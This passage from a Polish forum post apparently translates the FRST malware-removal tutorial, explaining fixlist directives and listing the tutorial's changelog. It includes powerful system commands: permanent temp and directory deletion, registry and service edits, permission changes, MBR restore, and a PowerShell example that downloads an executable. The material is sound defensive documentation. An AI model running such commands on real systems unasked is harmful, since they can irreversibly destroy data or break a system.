Należy użyć nazwy usługi występującej w rejestrze lub logu FRST, bez dodawania czegokolwiek. Na przykład cudzysłowy nie są wymagane.

 

 

EmptyEventLogs:

 

Czyści Dzienniki zdarzeń Windows.  Zostanie wydrukowana ilość wyczyszczonych dzienników oraz ewentualne błędy.

 

 

EmptyTemp:

Opróżnia następujące katalogi:

  • Windows Temp
  • Foldery Temp użytkowników
  • Pamięci podręczne (Cache), magazyny HTML5, Ciasteczka (Cookies) i Historia przeglądarek skanowanych przez FRST z wyjątkiem klonów Firefox
  • Pamięć podręczna ostatnio otwieranych plików
  • Pamięć podręczna Discord
  • Pamięć podręczna Java
  • Pamięć podręczna HTML Steam
  • Pamięć podręczna ikon oraz miniatur Eksploratora Windows
  • Kolejka transferu BITS (pliki qmgr.db i qmgr*.dat)
  • Pamięć podręczna WinHTTP AutoProxy
  • Pamięć podręczna DNS
  • Kosz

 

Uruchomienie komendy EmptyTemp: zaowocuje automatycznym restartem systemu po ukończeniu zadania, co znosi konieczność posługiwania się odrębną dyrektywą Reboot:.
Nie ma również znaczenia lokalizacja dyrektywy EmptyTemp: w fixlist (początek, środek lub koniec), gdyż zostanie ona uruchomiona dopiero po przetworzeniu wszystkich innych linii w fixlist.
 

Ważne: Dyrektywa EmptyTemp: usuwa obiekty permanentnie. Nie są one przesuwane do kwarantanny. Dyrektywa jest nieczynna w Środowisku odzyskiwania systemu (RE), by zapobiec ewentualnym szkodom.

 

 

ExportKey: i ExportValue:

Bardziej niezawodny sposób inspekcji zawartości klucza. Dyrektywy omijają niektóre ograniczenia narzędzi systemowych regedit.exe i reg.exe. Różnicą pomiędzy dyrektywami jest zakres eksportu. ExportKey: listuje wszystkie wartości i podklucze rekursywnie, natomiast ExportValue: pokazuje tylko wartości w kluczu.

Składnia poleceń:

 

ExportKey: klucz

 

ExportValue: klucz


Przykład:

 

ExportKey: HKEY_LOCAL_MACHINE\SOFTWARE\Podejrzany klucz

 

================== ExportKey: ===================

[HKEY_LOCAL_MACHINE\SOFTWARE\Podejrzany klucz]
[HKEY_LOCAL_MACHINE\SOFTWARE\Podejrzany klucz\NiepoprawnyKlucz ]
"Ukryta wartość"="Ukryte dane"
[HKEY_LOCAL_MACHINE\SOFTWARE\Podejrzany klucz\ZablokowanyKlucz]
HKEY_LOCAL_MACHINE\SOFTWARE\Podejrzany klucz\ZablokowanyKlucz => Odmowa dostępu.

=== Koniec ExportKey ===

 

Eksport jest przeznaczony tylko do celów analitycznych i nie może zostać użyty do operacji z kopią zapasową i importem.

 

 

File:

Do sprawdzania właściwości pliku. Można załączyć wiele plików, rozdzielonych średnikami. Składnia polecenia:

 

File: ścieżka;ścieżka

 

Przykład:

 

File: C:\Users\User\Desktop\amtemu.v0.9.1-painter.exe

 

========================= File: C:\Users\User\Desktop\amtemu.v0.9.1-painter.exe ========================

C:\Users\User\Desktop\amtemu.v0.9.1-painter.exe
Brak podpisu cyfrowego
MD5: A209B88B9B2CF7339BE0AC5126417875
Data utworzenia i modyfikacji: 2024-03-09 12:20 - 2017-04-10 11:44
Rozmiar: 002546176
Atrybuty: ----A
Firma: PainteR
Wewnętrzna nazwa: ProxyEmu
Oryginalna nazwa: emuext.exe
Produkt: ProxyEmu
Opis: ProxyEmu
Plik Wersja: 0.9.1.0
Produkt Wersja: 0.9.1.0
Prawa autorskie: painter
Virusscan: https://virusscan.jotti.org/filescanjob/k4nj4qatm6

====== Koniec File: ======

 

Weryfikacja podpisów cyfrowych nie jest dostępna z poziomu Środowiska odzyskiwania systemu (RE).

 

 

FilesInDirectory: i Folder:

Do sprawdzania zawartości folderu. FilesInDirectory: jest przeznaczone do listowania plików pasujących do jednego lub większej ilości wzorów z użyciem znaków wieloznacznych *. Natomiast Folder: jest zaprojektowany do pobrania pełnej zawartości folderu. Rezultaty obu dyrektyw zawierają sumy kontrolne MD5 (dla wszystkich plików) oraz podpisy cyfrowe (dla plików .exe, .dll, .sys i .mui).

Składnia poleceń:

 

FilesInDirectory: ścieżka\wzór;wzór

 

Folder: ścieżka


Przykład:

 

FilesInDirectory: C:\Windows\desktop-7ec3qg0\*.exe;*.dll
Folder: C:\Windows\desktop-7ec3qg0

 

Dyrektywa Folder: działa rekursywnie i drukuje zawartość wszystkich podfolderów, w konsekwencji może produkować gigantyczne logi.

 

 

FindFolder:

Zobacz opis Funkcji wyszukiwania w sekcji Pozostałe skany opcjonalne. Dyrektywa działa w taki sam sposób jak FindFolder: w polu Search/Szukaj, tylko rezultaty są nagrywane w pliku Fixlog.txt.


Hosts:

Do resetu pliku hosts. Popatrz również na ustęp hosts w sekcji Skan główny (FRST.txt).


ListPermissions:

Używana do pobierania spisu uprawnień plików, folderów oraz kluczy załączonych w skrypcie. Składnia polecenia:

 

ListPermissions: ścieżka/klucz


Przykład:

 

ListPermissions: C:\Windows\Explorer.exe
ListPermissions: C:\Users\User\AppData
ListPermissions: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip
ListPermissions: HKLM\SYSTEM\CurrentControlSet\services\afd

 

 

Move:

Do przenoszenia lub zmiany nazwy pliku, gdy zawodzi standardowa komenda MS Rename, szczególnie wówczas, gdy odbywa się to pomiędzy dyskami. Składnia polecenia:

 

Move: źródło cel


Przykład:

 

Move: c:\WINDOWS\system32\drivers\afd.sys c:\WINDOWS\system32\drivers\afd.sys.old
Move: c:\WINDOWS\system32\drivers\atapi.bak c:\WINDOWS\system32\drivers\atapi.sys


Narzędzie przenosi plik docelowy do kwarantanny Quarantine (o ile istnieje), następnie przenosi plik źródłowy do lokalizacji docelowej.

 

Zmiana nazwy może być przeprowadzona przy użyciu dyrektywy Move:.

 

Ścieżka docelowa powinna zawierać nazwę pliku, nawet w przypadku, gdy plik nie istnieje w docelowym katalogu.

 

 

Powershell:

Do uruchamiania komend lub skryptów PowerShell. Składnia polecenia:

1. By uruchomić pojedynczą niezależną komendę PowerShell i uzyskać wyniki w Fixlog.txt:

 

Powershell: komenda


Przykład:

 

Powershell: Get-Service


2. By uruchomić pojedynczą niezależną komendę PowerShell i przekierować wyniki do zewnętrznego pliku tekstowego (nie do Fixlog.txt) zastosuj operatory przekierowania lub cmdlet Out-File:

 

Powershell: komenda > "ścieżka do pliku tekstowego"

 

Powershell: komenda | Out-File "ścieżka do pliku tekstowego"


Przykład:

 

Powershell: Get-Service > C:\log.txt
Powershell: Get-Process >> C:\log.txt


3. By uruchomić gotowy plik skryptu (.ps1) zawierający jedną lub więcej komend/linii skryptu PowerShell:

 

Powershell: "ścieżka do pliku skryptu"


Przykłady:

 

Powershell: C:\Users\NazwaUżytkownika\Desktop\skrypt.ps1

 

Powershell: "C:\Users\Nazwa Użytkownika\Desktop\skrypt.ps1"


4. By uruchomić więcej komend/linii skryptu PowerShell tak jakby były w pliku skryptu (.ps1), ale bez tworzenia pliku .ps1, zastosuj średnik ; zamiast przejść do nowej linii by je oddzielić:

 

Powershell: linia 1; linia 2; (i tak dalej)


Przykład:

 

Powershell: $WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://serwer/plik.exe", "C:\Users\User\Desktop\plik.exe")


Alternatywnie można skorzystać z dyrektyw StartPowershell:EndPowershell: (patrz dalej).


Reboot:

Do wymuszania restartu systemu. Pozycja komendy w pliku fixlist jest bez znaczenia. Nawet po umieszczeniu jej na początku skryptu restart zostanie wykonany dopiero po przetworzeniu wszystkich innych poleceń naprawczych.

 

W Środowisku odzyskiwania systemu (RE) komenda nie działa, gdyż jest zbędna.

 

 

Reg:

Do manipulowania rejestrem Windows przy udziale konsolowego narzędzia Reg. Składnia polecenia:

 

Reg: komenda reg


Przykład:

 

Reg: reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v Start /t REG_DWORD /d 0x2 /f
Reg: reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" C:\Users\User\Desktop\backup.reg

 

W odróżnieniu od natywnych dyrektyw FRST, polecenie Reg powinno mieć poprawną składnię polecenia reg.exe, jak np. użycie cudzysłowów " w przypadku obecności spacji w nazwie klucza/wartości.

 

Dyrektywa ta nie jest zdolna przetworzyć kluczy/wartości zablokowanych lub z niepoprawną nazwą. Zobacz opis dyrektyw DeleteKey: i DeleteValue: wcześniej w tutorialu.

 


RemoveDirectory:

Do usuwania (a nie przenoszenia do Quarantine) katalogów z ograniczonymi uprawnieniami i niepoprawnymi ścieżkami lub nazwami. Nie ma potrzeby stosowania dyrektywy Unlock:. Dyrektywa ta powinna zostać użyta dla katalogów, które opierają się standardowym operacjom przesunięcia. W przypadku Trybu awaryjnego powinna być bardzo silna, a w przypadku środowiska naprawy RE powinna być najsilniejsza.

Skrypt będzie następujący:

 

RemoveDirectory: ścieżka

 


RemoveProxy:

Usuwa ustawienia proxy:
- Polityki restrykcji Internet Explorer HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer oraz ProxySettingsPerUser w HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings.
- Wartości ProxyEnable (jeśli równe 1), ProxyServer, AutoConfigURL, DefaultConnectionSettings i SavedLegacySettings z kluczy globalnych i użytkownika. Wykonuje także komendę BITSAdmin z przełącznikiem NO_PROXY.
- Modyfikację domyślnej wartości w kluczu HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies.

 

W przypadku gdy jest aktywne oprogramowanie lub usługa przywracające te ustawienia, oprogramowanie powinno zostać odinstalowane a usługa usunięta przed skorzystaniem z dyrektywy. Ma to na celu zapobiec odtwarzaniu ustawień proxy.

 

 

Replace:

Do podmiany pliku. Składnia polecenia:

 

Replace: źródło cel


Przykład:

 

Replace: C:\WINDOWS\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.14393.206_none_cf8ff0d2c0eeb431\dnsapi.dll C:\WINDOWS\system32\dnsapi.dll
Replace: C:\WINDOWS\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.14393.206_none_d9e49b24f54f762c\dnsapi.dll C:\WINDOWS\SysWOW64\dnsapi.dll


Narzędzie przenosi docelowy plik (o ile jest obecny) do katalogu kwarantanny (Quarantine) i następnie kopiuje źródłowy w miejsce docelowe.

Nie przenosi pliku źródłowego i jest on dalej obecny w oryginalnej lokalizacji. A zatem w powyższym przykładzie dnsapi.dll w katalogach WinSxS pozostanie niezmieniony.

 

Ścieżka docelowa powinna zawierać nazwę pliku nawet wtedy, gdy plik nie istnieje w katalogu docelowym.

 

Komenda zakończy się niepowodzeniem w przypadku braku docelowego katalogu. FRST nie odbudowuje kompletnej struktury katalogów. Zamiennie można wykorzystać dyrektywę Copy:.

 

 

RestoreFromBackup:

Przy pierwszym uruchomieniu narzędzie tworzy kopię zapasową kopiując gałęzie rejestru do katalogu %SystemDrive%\FRST\Hives (zazwyczaj C:\FRST\Hives). Nie zostanie ona nadpisana / usunięta podczas kolejnych uruchomień programu, o ile nie jest starsza niż dwa miesiące. Gdyby coś poszło nie tak, wybrana gałąź może zostać przywrócona. Składnia jest następująca:

 

RestoreFromBackup: NazwaGałęzi


Przykłady:

 

RestoreFromBackup: software
RestoreFromBackup: system

 


RestoreMbr:

Do przywrócenia MBR z pliku MBR.bin FRST wykorzystuje narzędzie MbrFix zapisane na dysku przenośnym. Wymagany jest zestaw: narzędzie MbrFix/MbrFix64, plik MBR.bin do odtworzenia i skrypt wskazujący dysk:

 

RestoreMbr: Drive=#


Przykład:

 

RestoreMbr: Drive=0


Kopia MBR używana do przywracania musi mieć nazwę MBR.bin i zostać dostarczona w postaci zzipowanej.


RestoreQuarantine:

Umożliwia odtworzenie całej zawartości kwarantanny Quarantine lub wyselekcjonowanych z niej obiektów (pojedynczego pliku, bądź też większej ilości plików/folderów).

Składnia polecenia do kompleksowego przywrócenia całej zawartości Quarantine:

 

RestoreQuarantine:


Lub:

 

RestoreQuarantine: C:\FRST\Quarantine


Składnia polecenia do przywracania konkretnego pliku lub folderu:

 

RestoreQuarantine: ŚcieżkaWQuarantine


Przykład:

 

RestoreQuarantine: C:\FRST\Quarantine\C\Program Files\Microsoft Office
RestoreQuarantine: C:\FRST\Quarantine\C\Users\NazwaUżytkownika\Desktop\ANOTB.exe.xBAD


W celu odnalezienia konkretnej ścieżki w Quarantine możesz użyć:

 

Folder: C:\FRST\Quarantine


Lub:

 

CMD: dir /a/b/s C:\FRST\Quarantine

 

Jeśli plik już istnieje (poza Quarantine) w ścieżce docelowej, FRST nie nadpisze go. Oryginalny plik nie zostanie przeniesiony i pozostanie w Quarantine. Gdy nadal będzie istniała konieczność odtworzenia tego pliku, wtedy należy plik w ścieżce docelowej usunąć lub zmienić mu nazwę.

 

 

SaveMbr:

Zajrzyj do sekcji Drives - MBR & Partition Table.

Aby utworzyć kopię MBR, użyj następującego skryptu:

 

SaveMbr: Drive=#


Przykład:

 

SaveMbr: Drive=0


Wynikowo zostanie utworzony plik MBRDUMP.txt na dysku przenośnym, który powinien zostać załączony przez użytkownika do postu.


SetDefaultFilePermissions:

Dedykowana zablokowanym plikom/folderom systemowym. Ustawia grupę "Administratorzy" jako właściciela oraz przyznaje prawa dostępowe określonym standardowym grupom w zależności od systemu.

 

Komenda nie asygnuje konta TrustedInstaller jako właściciela, niemniej może zostać użyta do plików/folderów systemowych zablokowanych przez malware.


Składnia polecenia:

 

SetDefaultFilePermissions: ścieżka

 


StartBatch:EndBatch:

Do tworzenia i uruchamiania plików batch. Składnia polecenia:

 

StartBatch:
Linia 1
Linia 2
Etc.
EndBatch:


Wyniki zostaną przekierowane do pliku Fixlog.txt.


StartPowershell:EndPowershell:

Lepsza alternatywa do tworzenia i uruchamiania plików PowerShell zawierających wiele linii skryptu (zobacz wcześniejszy opis dyrektywy Powershell:). Składnia polecenia:

 

StartPowershell:
Linia 1
Linia 2
Etc.
EndPowershell:


Wyniki zostaną przekierowane do pliku Fixlog.txt.


StartRegedit: — EndRegedit:

Do tworzenia i importu pliku rejestru (.reg). Składnia polecenia:

 

StartRegedit:
format pliku .reg
EndRegedit:


Załączenie nagłówka Windows Registry Editor Version 5.00 jest opcjonalne, w przeciwieństwie do nagłówka REGEDIT4 który jest wymagany.

Przykład:

 

StartRegedit:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MpsSvc]
"Start"=dword:00000002
EndRegedit:


W pliku Fixlog.txt pojawi się potwierdzenie operacji:

 

Registry ====> The operation completed successfully.

 

Rejestr ====> Operacja ukończona pomyślnie.

 

Linia potwierdzająca pojawia się niezależnie od ewentualnych błędów w pliku .reg.

 

Te dyrektywy nie są zdolne przetworzyć kluczy/wartości zablokowanych lub z niepoprawną nazwą. Zobacz opis dyrektyw DeleteKey: i DeleteValue: wcześniej w tutorialu.

 

 

 

Symlink:
 
Lista linków symbolicznych lub junkcji w wybranym folderze. Składnia polecenia:

 

Symlink: ścieżka

 

Przykład:

 

Symlink: C:\Windows

 

Dyrektywa działa rekursywnie, toteż w zależności od lokalizacji skan może trwać długo.

 

 

SystemRestore:

 

Do włączania lub wyłączania Przywracania systemu. Składnia polecenia:

 

SystemRestore: On

 

SystemRestore: Off

 

W przypadku użycia przełącznika On, FRST sprawdza czy jest wystarczająca ilość wolnego miejsca na dysku, by włączyć Przywracanie systemu. Jeśli te wymagania nie są spełnione pojawi się błąd.

 

 

TasksDetails:

Do wyliczania dodatkowych detali zadań Harmonogramu związanych z czasem uruchomienia.


Przykład:

 

========================= TasksDetails: ========================

UCBrowserUpdater (LastRunTime: NA -> NextRunTime: 2016-10-13 11:32:00 -> Status: Ready -> Schedule Type: Undefined)

 

Dyrektywa nie jest obsługiwana na Windows XP i działa tylko w trybie normalnym.

 

 

testsigning on:

 

Dla systemu Windows Vista i nowszych, nie obsługiwana na urządzeniach z włączonym Bezpiecznym rozruchem (Secure Boot).


Włączone testsigning to niedomyślna modyfikacja BCD, która może pojawić się na skutek ingerencji malware lub akcji użytkowników próbujących instalować niewspierane sterowniki. Gdy FRST zlokalizuje dowód na tego rodzaju modyfikację, zaraportuje to w następujący sposób:
 

testsigning: ==> 'testsigning' is set. Check for possible unsigned driver <===== ATTENTION

 

testsigning: ==> Ustawiony "Tryb testu". Sprawdź obecność niepodpisanego sterownika <===== UWAGA


Przeszukaj sekcję Drivers / Sterowniki pod kątem sterownika pasującego do ostrzeżenia. W zależności od sytuacji, załącz sterownik razem z ostrzeżeniem lub samo ostrzeżenie w fixlist.

Gdy po przetworzeniu powyższych wejść pojawią się skutki uboczne, do dalszej diagnostyki skorzystaj z dyrektywy włączającej tryb testsigning.

 

 

Unlock:

W przypadku plików/folderów ustawia jako właściciela grupę "Administratorzy" i daje dostęp dla "Administratorzy", "Użytkownicy" i "SYSTEM". Powinna być stosowana w kontekście szkodliwych plików/folderów. Do zablokowanych obiektów systemowych służy dyrektywa SetDefaultFilePermissions:.

W przypadku kluczy rejestru ustawia jako właściciela grupę "Administratorzy" i przyznaje grupom typowy dostęp. Działa wyłącznie na kluczu nadrzędnym (brak rekursywności). Ma zastosowanie do zarówno szkodliwych jak i autoryzowanych kluczy.

Składnia polecenia:

 

Unlock: ścieżka

 

Obiekt przeznaczony do usunięcia nie musi być odblokowany przed usunięciem:
- W przypadku plików/folderów po prostu załącz ich ścieżkę w fixlist, a FRST zresetuje uprawnienia i przeniesie obiekty do Quarantine. Do permanentnego usuwania folderów służy dyrektywa RemoveDirectory:.
- W przypadku kluczy rejestru wdróż dyrektywę DeleteKey:.

 

 

Virusscan:

Do sprawdzania plików na Jotti. FRST wyszukuje poprzednio dostępną analizę w bazie Jotti. W przypadku jej braku, plik zostanie przesłany do analizy.

Można załączyć wiele plików, rozdzielonych średnikami. Składnia polecenia:

 

Virusscan: ścieżka;ścieżka

 

 

Zip:


Pakowanie wybranych plików/folderów do archiwum Data_Czas.zip na Pulpicie, w celu dostarczenia przez użytkownika do analizy. W przypadku plików/folderów z powielonymi nazwami zostanie utworzone więcej niż jedno archiwum.

Można załączyć dowolną ilość ścieżek, rozdzielonych średnikami. Składnia polecenia:

 

Zip: ścieżka;ścieżka


Przykład:

 

Zip: C:\malware.exe;C:\Windows\Minidump;C:\Windows\Logs\CBS\CBS.log

 

 

Edytowane przez picasso
Odnośnik do komentarza
  • 6 miesięcy temu...

Lista zmian 2013-2020

Rewizje tutorialu:

 

 

08/30/2013 Dodany opis ADS (Alternate Data Streams) w sekcji "Fix - naprawa"
08/31/2013 Loaded Modules - dodane do listy Additional Scan w sekcji "Scan - Wynik"
08/31/2013 Loaded Modules - dodane do ustępu Addition.txt
08/31/2013 W sekcji "Services" lista "TypStartu" rozszerzona o numer 5 (przyznany przez FRST, gdy nie można określić typu startu)
09/11/2013 Poszerzenie wyjaśnień odnośnie wartości Run, modyfikacji StartMenuInternet, opisu Chrome i Services
09/11/2013 Dodany atrybut N
09/11/2013 Dodany paragraf dedykujący Unicode
09/11/2013 Dodane objaśnienie dla DeleteJunctionsInDirectory:
09/24/2013 Dodane opisy "Security Center" i "Safe Mode" w Addition.txt
11/01/2013 Sekcja Winsock: Catalog5 rozszerzona o adnotację powtórzenia naprawy "netsh winsock reset", jeśli nie zadziała w pierwszym podejściu
11/19/2013 Dodana informacja o nagłówku Fixlog w sekcji "Fix - Naprawa"
12/15/2013 DeleteJunctionsInDirectory: może być używane w każdym trybie
12/15/2013 Sekcja Winsock: Catalog5 rozszerzona o przykład naprawy braku dostępu do internetu
12/30/2013 RemoveDirectory: i SetDefaultFilePermissions: dodane do Dyrektyw/Poleceń
12/30/2013 Dodane wyjaśnienie jakie ustawienia aplikuje dyrektywa Unlock:
12/30/2013 Dalsze wyjaśnienia "Funkcji wyszukiwania"
01/19/2014 Dodany komunikat na temat niezgodności FRST z maszynami XP 64-bit
01/19/2014 Dodane objaśnienie Whitelisting
01/19/2014 Poprawiony i zaktualizowany przykładowy Nagłówek
01/22/2014 W sekcji Registry dodana notatka związana z przetwarzaniem Applnit_Dlls
01/29/2014 Sekcja "Search Files" uzupełniona o adnotację na temat przeszukiwania napędu X: w środowisku RE
02/12/2014 Objaśnienie ukrytych programów w sekcji "Installed programs" w Addition.txt
02/12/2014 Raport "Disabled items from MSCONFIG" dodany w sekcji Addition.txt
03/04/2014 Zaktualizowany zrzut ekranu konsoli oraz lista "Skany opcjonalne"
03/06/2014 Dodana komenda Reboot:
03/14/2014 Dodana komenda RestoreQuarantine:
03/14/2014 Dodane sekcje "Skany opcjonalne", Drivers MD5 i Shortcut.txt
03/15/2014 Dodany przykładowy skrypt, by zobrazować blokadę rozszerzeń Google Chrome przy udziale Polityki grup
03/18/2014 Rozszerzony opis sekcji wejść Winsock dla większej jasności
04/24/2014 Dodana komenda ListPermissions:
04/24/2014 Wyjaśnienie w jaki sposób FRST obchodzi się z naprawami obiektów z grupy "Services" w sekcji "Fix - naprawa"
04/24/2014 Uzupełnienie listy Dyrektywy/Polecenia o pozycję SaveMbr:
05/02/2014 Dodana dyrektywa DeleteKey: do spisu Dyrektyw/Poleceń
05/08/2014 Dodany opis sekcji "Exe Association" w Addition.txt
05/16/2014 Sekcja "Funkcja wyszukiwania" zaktualizowana: ustęp "Search Files" zedytowany dla większej jasności oraz dodany opis nowej funkcji "Search Registry"
06/02/2014 Sekcja Chrome rozszerzona o aspekt wystąpienia błędu pliku "Preferences"
06/10/2014 Dodana komenda VerifySignature:.
06/10/2014 Rozszerzenie opisu ustępu "Registry" w sekcji "Fix - Naprawa"
06/24/2014 Opis "Domyślne obszary skanowania" zmieniony dla większej jasności
07/22/2014 Opis Firefox rozszerzony o wzmiankę, iż klucze FF są listowane niezależnie od tego czy FF jest zainstalowany
07/22/2014 Komenda Deletekey: pozyskała zdolność usuwania linków symbolicznych rejestru
07/29/2014 Lista Custom CLSID dodana do sekcji skanu Addition
08/11/2014 Dodana dyrektywa EmptyTemp:
08/14/2014 Dodana pozycja cache Java do listy EmptyTemp: oraz informacja o procesorze w sekcji Memory info
08/19/2014 Naniesiona poprawka w sekcji Chrome. Wszystkie elementy z wyjątkiem DefaultSearchProvider mogą być teraz naprawiane za pomocą FRST
08/24/2014 Zmodyfikowany ustęp DeleteJunctionsInDirectory:
08/27/2014 Dodany opis sekcji "Some content of TEMP"
08/27/2014 Dodana komenda Hosts:
08/27/2014 Zaktualizowane niektóre nazewnictwo oraz wstawione słowo "Platform:" w przykładowym nagłówku
08/28/2014 W sekcji One Month Created Files and Folders i One Month Modified Files and Folders dodana notatka, że wieloznak nie działa z folderami
08/28/2014 Dodana informacja w którym z raportów w zależności od trybu uruchomienia pojawią się sekcje EXE ASSOCIATION, Restore Points i Memory info
08/31/2014 Oficjalnie dodany link do polskiego tłumaczenia z fixitpc.pl
09/02/2014 W opisie "LastRegBack" rozwinięcie akronimu "LKGC"
09/02/2014 W sekcji "Installed Programs" dodane objaśnienie tyczące oznaczania programów adware/PUP
09/02/2014 W sekcji "Loaded Modules" dodane ogólne objaśnienie
09/02/2014 Dodane objaśnienie tyczące przetwarzania wtyczek Firefox
09/07/2014 Uproszczony opis dodatków, rozszerzeń i wtyczek Firefox
09/07/2014 Wejścia rejestru Chrome są listowane niezależnie od tego czy przeglądarka jest zainstalowana
09/08/2014 Dodana dyrektywa CloseProcesses:
09/19/2014 Zaktualizowany nagłówek w sekcji "Scan - Wynik"
10/11/2014 Zaktualizowany nagłówek w sekcji "Scan - Wynik" o informacje związane z załadowanym profilem
10/11/2014 Addition.txt zaktualizowany o sekcję "Accounts"
10/11/2014 W sekcji "Wprowadzenie" zaktualizowana informacja tycząca Whitelist
10/13/2014 Dodana dyrektywa FindFolder:
10/15/2014 Zaktualizowany opis i przykładowy nagłówek Fixlog
10/16/2014 W sekcji "Scan - Wynik" dodane objaśnienie formy nagłówka w Środowisku odzyskiwania systemu (RE)
12/02/2014 Przykłady IE i FF HKCU zaktualizowane do HKU
12/02/2014 Dołączone ostrzeżenie o wykryciu Google Chrome typu "dev"
12/02/2014 Usunięte odniesienie tyczące ostrzeżenia o ewentualnym uszkodzeniu pliku "Preferences" Google Chrome. Nieaktualne w związku ze zmianami w Chrome.
12/02/2014 Usunięte odniesienie tyczące wejścia Google Chrome DefaultSearchProvider. Nieaktualne w związku ze zmianami w Chrome.
12/03/2014 Przykład HKCU w Addition.txt zaktualizowany do HKU
12/13/2014 Zaktualizowana forma etykiety ostrzeżenia testsigning:
12/19/2014 Dodana dyrektywa CreateRestorePoint:
12/29/2014 W nagłówku dodana informacja o domyślnej przeglądarce
01/12/2015 Poprawiony ustęp Firefox w sekcji "Fix - Naprawa"
01/24/2015 Dodana informacja o nagłówku w sekcji Addition.txt
01/24/2015 W sekcji "Registry" dodany przykład detekcji wartości DisableSR i/lub DisableConfig
01/27/2015 W sekcji "Registry" dodana notatka adresująca wyłączone Przywracanie systemu zgłaszane w Addition.txt
01/28/2015 Przeglądarka Opera dodana do sekcji "Fix - Naprawa"
01/28/2015 Dodany opis usuwania rozszerzeń Google Chrome
02/09/2015 Opis dyrektywy DeleteKey: rozszerzony o możliwość stosowania formatu regedit
02/16/2015 Dodany opis skanu "Other Areas" w sekcji Addition.txt
03/01/2015 Opis dyrektywy EmptyTemp: uzupełniony o czyszczenie HTML5 Local Storage oraz Opery
03/01/2015 Zaktualizowany zrzut ekranu konsoli
03/05/2015 Zaktualizowane linki pobierania
03/05/2015 W sekcji "Fix - Naprawa" ustęp "Services - Drivers" zmieniony dla większej jasności
03/09/2015 Dodana dyrektywa RemoveProxy:
03/09/2015 Dodana opcja skanu "90 Days Files"
04/13/2015 Zaktualizowany opis dyrektywy EmptyTemp: o informację, że Historia FF nie jest już usuwana
04/22/2015 Dodany skan "Internet Explorer trusted/restricted" w sekcji Addition.txt
04/27/2015 Dodany skan "FirewallRules" w sekcji Addition.txt
07/21/2015 Dodane objaśnienie oznaczenia [X] w sekcji "Services - Drivers"
07/22/2015 Dodany skan ustawień UAC i Zapory systemowej w sekcji "Other Areas" w Addition.txt
08/28/2015 Doprecyzowany wstępny opis w sekcji Internet
08/28/2015 Dodany link do opisu dyrektywy RestoreMBR:
08/28/2015 Zaktualizowane różne przykłady w celu odbicia kosmetycznych zmian w wyglądzie raportów
09/01/2015 Zaktualizowana sekcja "Internet" w celu odbicia zmiany izolującej skan Internet Explorer od reszty wpisów
09/07/2015 Zaktualizowany przykładowy nagłówek Addition.txt
10/09/2015 Dodany Windows 10 do wątku "Obsługiwane systemy"
10/09/2015 Dodany skan Edge w sekcji "Internet"
10/09/2015 Opis Firefox i Chrome rozszerzony o obsługę wielu profilów
10/09/2015 Zaktualizowany format restrykcji w opisie Chrome
10/09/2015 Dodany przykład do sekcji "Scheduled Tasks" w Addition.txt
10/09/2015 Zaktualizowany opis "MSCONFIG/TASK MANAGER disabled items" w Addition.txt
10/09/2015 Microsoft Office usunięty z sekcji "Event log errors"
10/09/2015 Dyrektywa EmptyTemp: zaktualizowana o czyszczenie przeglądarki Edge
10/22/2015 Dodana pozycja "List BCD" do spisu treści oraz sekcji "Pozostałe funkcje"
10/22/2015 Dodana detekcja niepodpisanych cyfrowo dodatków Firefox
10/22/2015 Zaktualizowane przykłady BHO, FF Plugins, rozszerzeń rejestru Chrome, Alternate Data Streams
11/13/2015 W ustępnie "Wprowadzenie" dodana instrukcja tworzenia raportu w języku angielskim, jeśli jest używana innojęzyczna wersja FRST
11/27/2015 Dodany skan "Shortcuts" w Addition.txt
12/01/2015 Zaktualizowany opis skanu "Shortcuts" w Addition.txt
12/01/2015 Poprawiony opis "One Month Created Files and Folders - One Month Modified Files and Folders" w sekcji "Fix - Naprawa"
12/30/2015 Dodana lista sekcji Addition.txt w indeksie oraz zmieniona kolejność niektórych opisów Addition.txt w celu zobrazowania bieżącej kolejności w raportach FRST
01/04/2016 Wykreślone znakowanie flagą "Attention" z opisu Shortcuts w Addition.txt
01/04/2016 Dodany skan GloballyOpenPorts do sekcji FirewallRules
03/05/2016 Opis Alternate Data Streams przeniesiony do bloku Addition.txt i uzupełniony o wyliczanie rozmiaru strumienia
03/05/2016 Dodana dyrektywa Zip:
04/20/2016 Zaktualizowany opis Opery
04/20/2016 Zmodyfikowany opis sekcji Services i Drivers dla większej jasności
04/20/2016 Dodany atrybut X do skanów One month...
04/20/2016 Usunięte odnośniki Alternate Data Streams z sekcji Fixing
04/20/2016 Zaktualizowany opis sekcji Bamital & volsnap
04/20/2016 Podmieniony link referencyjny stref zabezpieczeń Internet Explorer
04/20/2016 Dodane opisy Hosts content i Restore Points do sekcji Addition.txt
04/20/2016 W opisie dyrektywy EmptyTemp: dodane czyszczenie cache HTML Steam oraz doprecyzowane czyszczenie BITS
04/20/2016 W opisie Search Files dodana weryfikacja podpisów cyfrowych
04/20/2016 Dodane notatki punktujące, że weryfikacja podpisów cyfrowych nie jest dostępna w Środowisku odzyskiwania systemu (RE)
04/20/2016 Różne mniejsze i kosmetyczne zmiany
04/28/2016 Dodana notatka punktująca limitacje skanu One month...
04/28/2016 Dodana detekcja malware WMI w sekcji Shortcuts w Addition.txt
04/28/2016 Zaktualizowany opis Shortcut.txt
05/10/2016 "EXE Association" przemianowane na "Association" (we wszystkich skanach) i rozszerzone (tylko w skanie Addition.txt)
05/10/2016 Skorygowany odczyt z dyrektywy File:
05/12/2016 Reorganizacje i uproszczenia w podziałach Spisu treści i postach
06/11/2016 Dodany link do rosyjskiej wersji tutoriala
06/16/2016 Zaktualizowana lista Default Scan Areas
06/16/2016 Objaśnienie użycia znaków "?" dodane w sekcjach One Month... i Search Registry.
06/16/2016 Dodana dyrektywa Powershell:
06/16/2016 Poprawiony opis dyrektywy Zip:
06/16/2016 Sprecyzowane ograniczenia obszaru skanów FindFolder: i Search Files
